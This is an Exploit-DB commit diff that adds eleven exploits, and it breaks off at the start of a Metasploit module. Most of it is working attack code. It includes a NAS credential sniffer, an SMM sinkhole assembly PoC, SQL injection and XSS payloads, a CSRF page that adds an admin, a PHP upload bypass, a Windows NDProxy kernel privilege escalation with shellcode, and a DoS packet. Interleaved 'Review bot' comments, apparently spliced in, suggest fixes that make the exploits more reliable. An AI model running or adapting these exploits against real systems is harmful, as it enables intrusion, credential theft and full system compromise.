DB: 2015-08-08

11 new exploits
This commit is contained in:
Offensive Security 2015-08-08 05:01:44 +00:00
parent 179d07f9d8
commit 84f888e59b
12 changed files with 1014 additions and 0 deletions


@ -34033,6 +34033,7 @@ id,file,description,date,author,platform,type,port
37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,"John Page",multiple,webapps,0
37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
@ -34043,6 +34044,16 @@ id,file,description,date,author,platform,type,port
37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
37717,platforms/windows/dos/37717.pl,"KMPlayer 3.9.x - .srt Crash PoC",2015-07-31,"Peyman Motevalli Manesh",windows,dos,0
37718,platforms/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash PoC",2015-07-31,"SATHISH ARTHAR",windows,dos,0
37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0
37721,platforms/multiple/dos/37721.c,"BIND9 - TKEY PoC",2015-08-01,"Errata Security",multiple,dos,0
37722,platforms/linux/local/37722.c,"Linux Privilege Escalation Due to Nested NMIs Interrupting espfix64",2015-08-05,"Andrew Lutomirski",linux,local,0
37723,platforms/multiple/dos/37723.py,"ISC BIND9 TKEY Remote DoS PoC",2015-08-05,elceef,multiple,dos,0
37724,platforms/linux/local/37724.asm,"Linux x86 Memory Sinkhole Privilege Escalation PoC",2015-08-07,"Christopher Domas",linux,local,0
37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0
37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80
37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
37732,platforms/win32/local/37732.c,"Windows NDProxy Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031



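--- a/platforms/hardware/webapps/37720.py
+++ b/platforms/hardware/webapps/37720.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python
+#
+# Exploit Title: NETGEAR ReadyNAS LAN /dbbroker Credential Stealing
+# Date: 25/07/2015
+# Exploit Author: St0rn
+# Vendor Homepage: www.netgear.fr/business/products/storage/readynas
+# Software Link: apps.readynas.com/pages/?page_id=143
+# Version: Firmware 6.2.4
+#
+### Import ###
+from scapy.all import *
+from sys import argv,exit
+from os import system
+### Clear Function ###
+def clear():
+system("/usr/bin/clear")
+### Function to get and decode credential ###
+def getReadyNASCredz(p):
+if p.haslayer(TCP) and p[IP].dst==argv[2]:
+if p.haslayer(Raw):
+if "POST /dbbroker" in p[Raw].load:
+tmp=p[Raw].load
+credz=tmp.split("\r\n")
+for i in credz:
+if "Authorization: Basic" in i:
+print "-----------------".center(80)
+print i.split(" ")[2].decode("base64").center(80)
+### Main ###
+if __name__ == '__main__':
+clear()
+if len(argv)<3:
+print "Usage: %s [device] [NAS_IP]" %(argv[0])
+exit(0)
+else:
+print "\n"
+print "#################".center(80)
+print "#G0 t0 G3t Cr3dZ#".center(80)
+print "#################\n".center(80)
+sniff(prn=getReadyNASCredz,iface=argv[1])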
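Review bot: `getReadyNASCredz` dereferences `p[IP].dst` after checking only `haslayer(TCP)`, so any TCP segment without an IPv4 layer (TCP over IPv6, for instance) raises inside the sniff callback instead of being skipped; guard the layer first with `if p.haslayer(IP) and p.haslayer(TCP) and p[IP].dst==argv[2]:`. `i.split(" ")[2]` also assumes exactly one space between `Basic` and the token, where `i.split()[-1]` tolerates any whitespace. The `.decode("base64")` call and the `print` statements are Python 2 only, which the header does not say. A one-line comment that the credential is an HTTP Basic `Authorization` header sent in cleartext to `/dbbroker` would make the actual weakness (no TLS on the LAN interface) explicit for a reader of the PoC.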

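--- a/platforms/linux/local/37724.asm
+++ b/platforms/linux/local/37724.asm
@@ -0,0 +1,74 @@
+; memory sinkhole proof of concept
+; hijack ring -2 execution through the apic overlay attack.
+; deployed in ring 0
+; the SMBASE register of the core under attack
+TARGET_SMBASE equ 0x1f5ef800
+; the location of the attack GDT.
+; this is determined by which register will be read out of the APIC
+; for the GDT base. the APIC registers at this range are hardwired,
+; and outside of our control; the SMM code will generally be reading
+; from APIC registers in the 0xb00 range if the SMM handler is page
+; aligned, or the 0x300 range if the SMM handler is not page aligned.
+; the register will be 0 if the SMM handler is aligned to a page
+; boundary, or 0x10000 if it is not.
+GDT_ADDRESS equ 0x10000
+; the value added to SMBASE by the SMM handler to compute the
+; protected mode far jump offset. we could eliminate the need for an
+; exact value with a nop sled in the hook.
+FJMP_OFFSET equ 0x8097
+; the offset of the SMM DSC structure from which the handler loads
+; critical information
+DSC_OFFSET equ 0xfb00
+; the descriptor value used in the SMM handlers far jump
+DESCRIPTOR_ADDRESS equ 0x10
+; MSR number for the APIC location
+APIC_BASE_MSR equ 0x1b
+; the target memory address to sinkhole
+SINKHOLE equ ((TARGET_SMBASE+DSC_OFFSET)&0xfffff000)
+; we will hijack the default SMM handler and point it to a payload
+; at this physical address.
+PAYLOAD_OFFSET equ 0x1000
+; compute the desired base address of the CS descriptor in the GDT.
+; this is calculated so that the fjmp performed in SMM is perfectly
+; redirected to the payload hook at PAYLOAD_OFFSET.
+CS_BASE equ (PAYLOAD_OFFSET-FJMP_OFFSET)
+; we target the boot strap processor for hijacking.
+APIC_BSP equ 0x100
+; the APIC must be activated for the attack to work.
+APIC_ACTIVE equ 0x800
+;;; begin attack ;;;
+; clear the processor caches,
+; to prevent bypassing the memory sinkhole on data fetches
+wbinvd
+; construct a hijack GDT in memory under our control
+; note: assume writing to identity mapped memory.
+; if non-identity mapped, translate these through the page tables first.
+mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+4],
+(CS_BASE&0xff000000) | (0x00cf9a00) |
+(CS_BASE&0x00ff0000)>>16
+mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+0],
+(CS_BASE&0x0000ffff)<<16 | 0xffff
+; remap the APIC to sinkhole SMMs DSC structure
+mov eax, SINKHOLE | APIC_ACTIVE | APIC_BSP
+mov edx, 0
+mov ecx, APIC_BASE_MSR
+wrmsr
+; wait for a periodic SMI to be triggered
+jmp $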
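Review bot: `TARGET_SMBASE`, `FJMP_OFFSET` and `DSC_OFFSET` (L92, L105, L108) are hard-coded for one firmware build and the header never says how they were recovered, so the PoC cannot be retargeted and a wrong value simply crashes the box; a comment such as `; NOTE: these three values are specific to the tested firmware - re-derive them from the target's SMM handler before running` belongs next to them. The operands of the two `mov dword` instructions at L133-L137 are split across lines; if the original has no trailing `\` continuation NASM rejects the source, which cannot be told from this rendering. After the `wrmsr` at L142 the BSP's local APIC registers are presumably no longer at their normal address and the core spins at `jmp $` with no return path, so the payload at `PAYLOAD_OFFSET` has to take over the machine completely; stating that up front would spare a reader from expecting the kernel to resume.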

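--- a/platforms/php/webapps/37725.txt
+++ b/platforms/php/webapps/37725.txt
@@ -0,0 +1,26 @@
+#------------------------------------------------------------------------------------------#
+# Exploit Title: Froxlor Server Management Panel - MySQL Login Information Disclosure #
+# Date: Jul 30 2015 #
+# Exploit Author: Dustin Dörr #
+# Vendor Homepage: https://www.froxlor.org/ #
+# Version: <= 0.9.33.1 #
+#------------------------------------------------------------------------------------------#
+An unauthenticated remote attacker is able to get the Froxlor MySQL password and username
+via webaccess due to wrong file permissions of the /logs/ folder in Froxlor version
+0.9.33.1 and earlier. The plain MySQL password and username may be stored in the
+/logs/sql-error.log file. This directory is publicly reachable by default.
+some default URLs are:
+- http://example.com/froxlor/logs/sql-error.log
+- http://cp.example.com/logs/sql-error.log
+- http://froxlor.example.com/logs/sql-error.log
+the certain section looks like this:
+/var/www/froxlor/lib/classes/database/class.Database.php(279):
+PDO->__construct('mysql:host=127....', 'DATABASE_USER', 'DATABASE_PASSWORD', Array)
+please note that the password in the logfile is truncated to 15 chars,
+therefore passwords longer than 15 chars are not fully visible to an attacker.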
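Review bot: The advisory stops at the disclosure and gives no fix or mitigation, so an operator cannot tell whether a later Froxlor release closes the `/logs/` exposure or what to do now; a `Fix:` line after L170 should name the two immediate actions, deny web access to the logs directory (or move it outside the document root) and rotate the MySQL credential, since anything already written to `sql-error.log` must be treated as compromised. The 15-character truncation at L169-L170 is a property of the PHP stack trace, not a mitigation: the first 15 characters of the password are still exposed, which is enough for most short or guessable passwords. The log entry also leaks the absolute install path and the DB host, which is worth listing under the disclosed data.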

platforms/php/webapps/37726.txt Executable file
View file

@ -0,0 +1,12 @@
# Exploit Title: PHP News Script 4.0.0 Sql Injection
# Date: 2015-08-01
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://phpnewsscript.com/
# Version: 4.0.0
# Tested on: CentOS
Exploit :
http://server/allgallery.php?id=-9999%27+[sql-command]+%23
Test :
http://server/demo/allgallery.php?id=-100%27+union+select+user()%23
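Review bot: The test payload at L186 (`union select user()`) only succeeds if the vulnerable `SELECT` returns exactly one column, and the advisory does not state the column count or how it was found, so the "Test" URL is not reproducible as written; one line such as `the query selects 1 column (probe with order by)` would fix that. The exploit template at L184 also deserves a note that `%27` closes the string literal and `%23` (`#`) comments out the remainder of the query, since that is what makes it work against the unquoted tail. No fix is mentioned; the `id` parameter should be bound with a prepared statement rather than concatenated into the query, and "Tested on: CentOS" says nothing about the PHP/MySQL versions that matter for this class of bug.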


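--- a/platforms/php/webapps/37734.html
+++ b/platforms/php/webapps/37734.html
@@ -0,0 +1,80 @@
+<!DOCTYPE html>
+<!--
+Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit
+Vendor: Microweber Team
+Product web page: http://www.microweber.com
+Affected version: 1.0.3
+Summary: Microweber is an open source drag and drop
+PHP/Laravel CMS licensed under Apache License, Version
+2.0 which allows you to create your own website, blog
+or online shop.
+Desc: The application allows users to perform certain
+actions via HTTP requests without performing any validity
+checks to verify the requests. This can be exploited to
+perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site. Stored
+cross-site scripting vulnerabilitity is also discovered.
+The issue is triggered when input passed via the POST
+parameter 'option_value' is not properly sanitized before
+being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session
+in context of an affected site.
+Tested on: Apache 2.4.10 (Win32)
+PHP 5.6.3
+MySQL 5.6.21
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2015-5249
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5249.php
+12.07.2015
+-->
+<html>
+<title>Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit</title>
+<br /><br />
+<body><center>
+<form action="http://localhost/microweber-latest/api/save_user" method="POST">
+<input type="hidden" name="id" value="0" />
+<input type="hidden" name="thumbnail" value="" />
+<input type="hidden" name="username" value="Freakazoid" />
+<input type="hidden" name="password" value="00110001" />
+<input type="hidden" name="email" value="lab@zeroscience.mk" />
+<input type="hidden" name="first_name" value="Joe" />
+<input type="hidden" name="last_name" value="Black" />
+<input type="hidden" name="is_active" value="1" />
+<input type="hidden" name="is_admin" value="1" />
+<input type="hidden" name="basic_mode" value="0" />
+<input type="hidden" name="api_key" value="" />
+<input type="submit" value="CSRF Adminize" />
+</form>
+</body>
+</html>
+<br /><br />
+<html>
+<body>
+<form action="http://localhost/microweber-latest/api/save_option" method="POST">
+<input type="hidden" name="option_key" value="website_keywords" />
+<input type="hidden" name="option_group" value="website" />
+<input type="hidden" name="option_value" value='"><img src=j onerror=confirm("ZSL")>' />
+<input type="submit" value="Store XSS" />
+</form></center>
+</body>
+</html>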
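Review bot: The file contains two complete `<html>` documents back to back with stray `<br />` tags between them (L223, L241-L242) and a `<center>` opened in the first `<body>` (L224) but closed in the second (L249), so the page only renders through browser error recovery; both forms belong inside one `<body>`. Both `action` URLs are fixed to `http://localhost/microweber-latest/`, which every reader has to edit, and nothing in the file says so; a comment near L225 such as `<!-- replace the host/path below with the target Microweber install -->` would help. The description at L201-L205 attributes the CSRF to missing request validation; it is worth being explicit that `api/save_user` accepts `is_admin=1` from a plain form POST with no anti-CSRF token, since that is the line an auditor will look for in the patched version.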

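--- a/platforms/php/webapps/37735.txt
+++ b/platforms/php/webapps/37735.txt
@@ -0,0 +1,74 @@
+
+Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution
+Vendor: Microweber Team
+Product web page: http://www.microweber.com
+Affected version: 1.0.3
+Summary: Microweber is an open source drag and drop PHP/Laravel CMS licensed
+under Apache License, Version 2.0 which allows you to create your own website,
+blog or online shop.
+Desc: Microweber suffers from an authenticated arbitrary command execution
+vulnerability. The issue is caused due to the improper verification when
+uploading files in '/src/Microweber/functions/plupload.php' script. This
+can be exploited to execute arbitrary PHP code by bypassing the extension
+restriction by putting the dot character at the end of the filename and uploading
+a malicious PHP script file that will be stored in '/userfiles/media/localhost/uploaded'
+directory.
+Tested on: Apache 2.4.10 (Win32)
+PHP 5.6.3
+MySQL 5.6.21
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2015-5250
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5250.php
+12.07.2015
+--
+PoC Requests:
+-------------
+1.
+POST /microweber-latest/plupload?token=1111111111222222222233333333334444444444&path=media%25255Clocalhost%25255C&path=media%255Clocalhost%255Cuploaded%255C HTTP/1.1
+Host: localhost
+Proxy-Connection: keep-alive
+Content-Length: 319
+Origin: http://localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqX83MP6Cg5JpA193
+Accept: */*
+Referer: http://localhost/microweber-latest/editor_tools/plupload?type=explorer&filters=*&multiple=true&autostart=undefined&mwv=1.0.3
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8
+Cookie: mwui=%7B%22%23modules-and-layouts%2C%23tab_modules%2C.tst-modules%22%3A%22true%22%7D; recommend=%7B%22logo%22%3A1%7D; back_to_admin=http%3A//localhost/microweber-latest/admin/view%3Amodules/load_module%3Afiles%23path%3Dmedia%255Clocalhost%255Cuploaded%255C%26select-file%3Dhttp%3A//localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php; laravel_session=eyJpdiI6ImNYNnkyWjJkOXZyTVRDMXlcL0pKQzBRPT0iLCJ2YWx1ZSI6Ilp6QjhDYjRRMEY4NGR5RzVuZGNxSnd1V3dGQ1R6OVdaWjZrZStiT1Q2bVM3UmRoQjNrak1ORzV5bXZjbzVDSitqdVVkdzdqOFVQa2hZdWRwMlwvMSttZz09IiwibWFjIjoiNGQxYzkwOTk4YmIzNTgzNWRiZmZlOTM4N2I2MzA1NjIzODcwNWRmMWM5ZDcwN2YxMGJlZmQ2ZjUxYmMzNjVjOSJ9
+------WebKitFormBoundaryqX83MP6Cg5JpA193
+Content-Disposition: form-data; name="name"
+phpinfo.php.
+------WebKitFormBoundaryqX83MP6Cg5JpA193
+Content-Disposition: form-data; name="file"; filename="phpinfo.php."
+Content-Type: application/octet-stream
+<?php
+phpinfo();
+?>
+------WebKitFormBoundaryqX83MP6Cg5JpA193--
+2.
+GET http://localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php HTTP/1.1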
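Review bot: The trailing-dot bypass at L299/L301 relies on the server's filesystem discarding the final `.` when the file is written, which is why the follow-up GET at L308 fetches `phpinfo.php` rather than `phpinfo.php.`; that is Windows behaviour, and since the advisory is tested on Win32 only it should say that on a Linux host the file is likely stored as `phpinfo.php.` and whether it executes then depends on the web server's handler mapping. The `path` query parameter appears twice at L285 with different encodings (`%25255C` vs `%255C`) and neither the duplication nor the double-encoding is explained; if only one is consumed by `plupload.php`, saying which makes the request reproducible. The request also carries a `laravel_session` cookie and a `token` value from the test instance (L285, L296); they are dead values here but are worth redacting to `<session>` so nobody mistakes them for a working bypass of the authentication requirement stated at L266.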

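--- a/platforms/php/webapps/37738.txt
+++ b/platforms/php/webapps/37738.txt
@@ -0,0 +1,39 @@
+Job Manager Persistent XSS
+Details
+========================================================================================
+Product: Job Manager Plugin For Wordpress
+Vendor-URL: www.wp-jobmanager.com
+CVE-ID: CVE-2015-2321
+Credits
+========================================================================================
+Discovered by: Owais Mehtab
+Affected Products:
+========================================================================================
+Job Manager Plugin <= 0.7.22
+Description
+========================================================================================
+"Job Manager Plugin For Wordpress"
+More Details
+========================================================================================
+A persistent Cross site scripting (XSS) in Job Manager Plugin has been discovered,
+the plugin's email field was not sanitized thus the vulnerability can be easily
+exploited and can be used to steal cookies,perform phishing attacks and other various
+attacks compromising the security of a user.
+Proof of Concept
+========================================================================================
+Click on the "send through your résume" and set the below vector in email field
+'"><img src=x onerror=prompt(document.cookie);>
+Now click on initiate chat
+PoC Video
+https://www.dropbox.com/s/i8cuf15hbdf5tmu/jobmanager-xss.mp4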
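Review bot: The advisory gives an affected range (`<= 0.7.22`, L326) but no fixed version, disclosure timeline or vendor response, so a reader cannot tell whether upgrading helps; a `Fixed in:` / `Status:` line under Affected Products is the missing piece. The PoC at L338-L340 says where the payload goes in (the application form's email field) but not where it renders (the admin-side application listing or a public page), which is what decides who is exposed and whether an unauthenticated applicant can hit an administrator; one sentence on the rendering context is needed. On the fix side the usual WordPress pattern applies and is worth stating: run the field through `sanitize_email()` on save and escape with `esc_html()` on output.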

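--- a/platforms/win32/local/37732.c
+++ b/platforms/win32/local/37732.c
@@ -0,0 +1,216 @@
+/*
+################################################################
+# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
+# Date: 2015-08-03
+# Exploit Author: Tomislav Paskalev
+# Vulnerable Software:
+# Windows XP SP3 x86
+# Windows XP SP2 x86-64
+# Windows 2003 SP2 x86
+# Windows 2003 SP2 x86-64
+# Windows 2003 SP2 IA-64
+# Supported vulnerable software:
+# Windows XP SP3 x86
+# Windows 2003 SP2 x86
+# Tested on:
+# Windows XP SP3 x86 EN
+# Windows 2003 SP2 x86 EN
+# CVE ID: 2013-5065
+################################################################
+# Vulnerability description:
+# NDPROXY is a system-provided driver that interfaces WAN
+# miniport drivers, call managers, and miniport call managers
+# to the Telephony Application Programming Interfaces (TAPI)
+# services.
+# The vulnerability is caused when the NDProxy.sys kernel
+# component fails to properly validate input.
+# An attacker who successfully exploited this vulnerability
+# could run arbitrary code in kernel mode (i.e. with SYSTEM
+# privileges).
+################################################################
+# Exploit notes:
+# Privileged shell execution:
+# - the SYSTEM shell will spawn within the existing shell
+# (i.e. exploit usable via a remote shell)
+# Exploit compiling:
+# - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
+# Exploit prerequisites:
+# - low privilege access to the target (remote shell or RDP)
+# - target not patched (KB2914368 not installed)
+# - service "Routing and Remote Access" running on the target
+# - "Power User" user group can start and stop services
+# - > sc query remoteaccess
+# - > sc start remoteaccess
+################################################################
+# Thanks to:
+# Andy (C PoC - Win XP SP3)
+# ryujin (Python PoC - Win XP SP3)
+################################################################
+# References:
+# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
+# https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
+# https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
+# https://www.exploit-db.com/exploits/30014/
+# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
+# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
+# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
+# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
+################################################################
+*/
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+typedef struct {
+PVOID Unknown1;
+PVOID Unknown2;
+PVOID Base;
+ULONG Size;
+ULONG Flags;
+USHORT Index;
+USHORT NameLength;
+USHORT LoadCount;
+USHORT PathLength;
+CHAR ImageName[256];
+} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
+typedef struct {
+ULONG Count;
+SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+typedef enum _SYSTEM_INFORMATION_CLASS {
+SystemModuleInformation = 11,
+SystemHandleInformation = 16
+} SYSTEM_INFORMATION_CLASS;
+typedef DWORD NTSTATUS;
+NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
+PVOID SystemInformation,
+ULONG SystemInformationLength,
+PULONG ReturnLength);
+static VOID InitFirstPage (void)
+{
+PVOID BaseAddress;
+ULONG RegionSize;
+NTSTATUS ReturnCode;
+FARPROC NtAllocateVirtualMemory;
+NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");
+fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
+RegionSize = 0xf000;
+BaseAddress = (PVOID) 0x00000001;
+ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
+&BaseAddress,
+0,
+&RegionSize,
+MEM_COMMIT | MEM_RESERVE,
+PAGE_EXECUTE_READWRITE);
+if (ReturnCode != 0)
+{
+fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
+fprintf (stderr, " Error code: %#X\n", ReturnCode);
+fflush (stderr);
+ExitProcess (1);
+}
+fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
+FillMemory (BaseAddress, RegionSize, 0x41);
+return;
+}
+int exploit (unsigned char *shellcode)
+{
+DWORD writtenBytes;
+int returnValue;
+InitFirstPage ();
+unsigned char *shellcodeBuffer;
+shellcodeBuffer = (char *) malloc (400);
+memset (shellcodeBuffer, (int) "xCC", 400);
+memcpy (shellcodeBuffer, shellcode, 112);
+returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
+if (returnValue == 0)
+{
+printf ("[-] Attempt to map memory_write failed\n");
+printf (" Error code: %d\n", GetLastError ());
+exit(1);
+}
+HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
+if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
+{
+printf ("[-] Creating a device handle on NDProxy failed\n");
+printf (" Error code: %d\n", GetLastError());
+exit (0);
+}
+DWORD inputBuffer [0x15] = {0};
+DWORD returnedBytes = 0;
+*(inputBuffer + 5) = 0x7030125;
+*(inputBuffer + 7) = 0x34;
+DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
+CloseHandle (ndProxyDeviceHandle);
+system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
+return 0;
+}
+int main (int argc, char **argv)
+{
+if (argc != 2)
+{
+printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
+printf (" supported OS_TYPE:\n");
+printf (" XP - Windows XP SP3 x86\n");
+printf (" 2k3 - Windows 2003 SP2 x86\n");
+printf ("[*] Note: the service \"Routing and Remote Access\"\n");
+printf (" must be running on the target machine\n");
+exit (0);
+}
+else
+{
+if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
+{
+unsigned char shellcodeXP[] =
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
+"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
+"\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
+"\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
+exploit (shellcodeXP);
+}
+else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
+{
+unsigned char shellcode2k3[] =
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
+"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
+"\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
+"\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
+exploit (shellcode2k3);
+}
+else
+{
+printf ("[-] Invalid argument\n");
+printf (" Argument used: %s\n", argv[1]);
+exit(0);
+}
+}
+}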
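Review bot: `memset (shellcodeBuffer, (int) "xCC", 400);` at L470 casts the address of a string literal to `int`, so the buffer is filled with the low byte of a pointer rather than the intended 0xCC padding; it should read `memset (shellcodeBuffer, 0xCC, 400);`. The `WriteProcessMemory` call at L472 then copies `0x400` (1024) bytes out of the 400-byte `malloc` at L469, a heap over-read that puts heap garbage into the null page; pass `400` (or allocate `0x400`) so the two lengths agree, and check the `malloc` result before using it. Neither defect changes whether the exploit fires, because the shellcode's final `\xC3` at byte 112 returns before the padding is ever reached, but both are real bugs in the new code. The failure paths at L484 and L537 call `exit (0)` and so report success to a calling script, unlike L477 which uses `exit(1)`; a non-zero status on all error exits is the consistent choice.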

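--- a/platforms/windows/dos/37739.py
+++ b/platforms/windows/dos/37739.py
@@ -0,0 +1,59 @@
+"""
+Product: Dell Netvault Backup
+Link: http://software.dell.com/products/netvault-backup/
+Vendor: Dell
+Vulnerable Version(s): 10.0.1.24 and probably prior
+Tested Version: Version 10.0.1.24
+Advisory Publication: July 30, 2015
+Vendor Notification: January 9, 2015
+Public Disclosure: July 30, 2015
+Vulnerability Type: Remote Denial of service
+CVE Reference: CVE-2015-5696
+Risk Level: Medium
+Discovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24
+-----------------------------------------------------------------------------------------------
+Advisory Details:
+Doing reverse engineering of the protocol was found several ways to cause a crash in the nvpmgr.exe process.The entire application (all processes) will die and it won't be able to restart again by itself unless someone do it manually.
+Proof of concept script:
+"""
+#!/usr/bin/python
+import socket as so
+from struct import *
+server = "192.168.140.130"
+port = 20031
+d = "\x18\x00\x00\x00"
+d += "\x01"
+#d += "\xCB\x22\x77\xC9" # Another crash example
+d += "\x18\xE8\xBE\xC8" # Will cause the crash
+d += "\x0B\x00\x00\x00" + "AAAA" + "B" * 6
+d += "\x00" # null byte
+##
+# send it
+s = so.socket(so.AF_INET, so.SOCK_STREAM)
+s.connect((server, port))
+s.send(d)
+s.close()
+"""
+-----------------------------------------------------------------------------------------------
+Solution:
+Disclosure timeline:
+2015-01-09 Vendor notified via email
+2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x
+2015-07-30 Public disclosure.
+The fix done by Dell was not checked by the researcher.
+-----------------------------------------------------------------------------------------------
+"""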

platforms/windows/local/37737.rb Executable file

@ -0,0 +1,321 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
